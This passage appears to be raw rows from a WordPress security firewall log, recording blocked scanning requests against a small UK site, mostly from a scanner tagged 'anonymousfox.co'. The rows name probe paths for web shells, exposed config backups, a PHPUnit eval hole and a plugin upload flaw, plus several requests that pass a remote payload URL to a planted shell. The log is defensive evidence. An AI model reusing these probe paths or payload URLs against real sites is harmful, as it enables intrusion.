Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mqkSCvc72JXMzGgrBDheNjAd',0,1637685434.0747,438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nAIu7ZB8gHEGXchPVNk0iDS9',0,1637685436.1519,407,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GHzVkw9ax27y0gEOtFXfScNY',0,1637685437.7781,164,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zcWUoyA9F51LvHunpZQ8Rh2C',0,1637685439.3524,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FN0iHq1ugpJGI2ndPD4zSltE',0,1637685441.3371,435,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DVKB6sE2nRGhqfWb3gFejOX8',0,1637685442.9582,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','13IboGFS8w5kgHqQtXfdUDlx',0,1637685444.7807,388,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','skB6jC7XqRQJUewOnNxT8DAE',0,1637685446.4645,428,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uYCGFeyj2Wqh80UZcmMSkHRJ',0,1637685449.5908,390,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TkGLBEra5IyfvAlDMOxe9Voj',0,1637685451.4890,318,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PbavzEUsyVJ0IZYmnS1gLxtp',0,1637685453.4294,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tDEiz1UYysL4Rf38NlQBodeX',0,1637685455.5364,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','guMPioNApmI2qOfwvEeG4YRZ',0,1637685457.4125,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','oZCaIrwKcAh6z8OLVHDlGYNq',0,1637685459.6353,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','a6gJqoIvzN1tQYeXdTkOHBD9',0,1637685461.6070,394,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pDLkKjcQ9yvtJfnERISomiNW',0,1637685463.4942,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qeW4vIZlcOiYu7Awbo2U1zpH',0,1637685465.2146,393,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1oIetdF4k5XnMgBy2NscvZRp',0,1637685467.1054,403,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yKat1QRSxZH6grbYTLw2IJ7e',0,1637685469.2859,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YjULyPtrWQI9kaX5lJ86mcRD',0,1637685471.6140,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dHgaVxIDp36Qh7SEPFJMet1X',0,1637685473.7232,417,'','GET',403,0,700,0,1,'',0),('63.141.252.69',1066269765,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','qDEmyk8hBlNVPt6LgIoZRO5s',0,1637689783.8457,447,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','UIDqcG95JfsyT1z3hORYApmn',0,1637696090.6779,410,'','GET',403,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','Fiuctrzad82PAkvyI6qDKogJ',0,1637696445.5999,166,'','POST',403,0,600,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','B3cvSELRG6Qaf20eXZoJwY4i',0,1637697680.9107,1264,'','GET',403,0,520,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','i63YUOF48MWveyEzPwxuGnoa',0,1637698393.7452,179,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-includes/widgets/class-wp-widget-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.012; !en.support.wordpress.com; !support.wordpress.com; support.wordpress.com; en.support.wordpress.com) Gecko\\/20120121 Firefox\\/40.0\"}','sbjzRt6Tr5cQiBa1lmvkEZHN',0,1637698724.7390,410,'','GET',403,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','3cAorKnR2bejFXiN1xqIPdkC',0,1637699672.7538,181,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1G68cHomkpSUqi4LIwXO9fba',0,1637700465.9360,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aS7qTxRPXC85FjnicAswb2Bp',0,1637700468.1080,1041,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VngB7yxrQae9RCYKTISlGo80',0,1637700470.9992,411,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GYcHoWwPQUEsdrKvqfAu63ni',0,1637700472.8961,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1AiGqP8embHUSxtojJ3aWdBK',0,1637700480.8001,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xWyjraRfnCvlkUSZ5sJbNBTu',0,1637700482.7949,129,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xS3GhYPy47JLmwM5AXqidRnz',0,1637700484.5038,387,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1JjOyPxVFK8m36fC0NztQXnr',0,1637700486.4633,381,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','70ioEncQ9fkj4gNlVtd3Rur2',0,1637700491.3122,379,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XSBIHzD63hM4xmd92kpteLTn',0,1637700493.4695,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IeDnbgCQYuAWqv87N0BlL6zr',0,1637700495.7204,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YtvnFR6pJUi3kCHuWMj0sS7f',0,1637700497.7655,436,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bvF7yo3KkVmsehqNcwxjBOlI',0,1637700499.4640,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uFqLENgvMSKYzVotnaW21cAJ',0,1637700501.3342,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','B2eThAoX7jyEO0CpxkNQDG8w',0,1637700503.0202,370,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7FLvIxglRfMXk3Bb0qdyr1HK',0,1637700504.7906,377,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1CivepjHsFZYTuWdVELAx2Jf',0,1637700509.1083,396,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YOdtgwLVPf4jiDErUkN0zobC',0,1637700512.9869,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6Nwi7lUPjsx0cozkrRAY1a3C',0,1637700514.9164,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Aa09XwlCLtRIQ872n5sMry6i',0,1637700517.4887,1146,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TQyvNraU7t8d5mPWMEzqs0kB',0,1637700520.3810,378,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aSY5lyJLtv7B3GP2pqwU1Cg8',0,1637700522.2779,378,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bBluVKOp8mLSnoHE2qZA3YRj',0,1637700524.4087,374,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QNTPgL8rdHEMVF4XnxGzvReB',0,1637700526.1456,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tas9Ug1uIi2Kc0Okz3VCv4SW',0,1637700527.8916,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1WpEexr9X3RbS7aqyPsnLhNO',0,1637700530.2010,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nFmIVLbKryTZRxfOkhgSG34e',0,1637700532.1203,400,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GfLWn8dVkwoF0XRy59ZilU3x',0,1637700534.0831,618,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qFMcVRTNWGgep942DKYX6rdH',0,1637700536.7825,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WsHTJjBG7byEoqD2dx3Ltn8m',0,1637700539.2795,396,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2bsptGJrWQ9cXnYZOTleDmPH',0,1637700541.2796,376,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Oqrs04fibYRPVWQJDFpyBtoL',0,1637700543.5011,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xwyCnVY8OKZQgaoSj17lkDUb',0,1637700545.4426,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xurHB0UYmijCLDa9wAZbWyon',0,1637700547.4372,435,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qxh7O1RSmnBbA95Fi62JlzTo',0,1637700550.2411,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2QtJqjKoNBuEysTH971eMAlr',0,1637700552.5640,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6M5misFve2HnagQNCZoBSxGD',0,1637700554.7991,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kaJ1bgYXDGh49vmWlurBFsPR',0,1637700567.6284,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AkKN9zn8DW5LCmwpqe0ivJbO',0,1637700569.7322,399,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9rtKvGjWJsXpd5koFxaR7U1Y',0,1637700571.3746,376,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aY6wdiW8URyP7xblC132pSIQ',0,1637700573.6345,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CVu9hrD5ojgFLUcemMSk8P0d',0,1637700579.4619,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Mq3SpbyfjGWszwr8oQCHktRc',0,1637700582.4325,373,'','GET',403,0,700,0,1,'',0),('185.12.15.132',3104575364,'','https://ashbooks.co.uk/old-index.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','au1ZY7BItSAqzwD9j5deX6c8',0,1637704888.8927,407,'','GET',403,0,700,0,1,'',0),('69.30.231.155',1159653275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 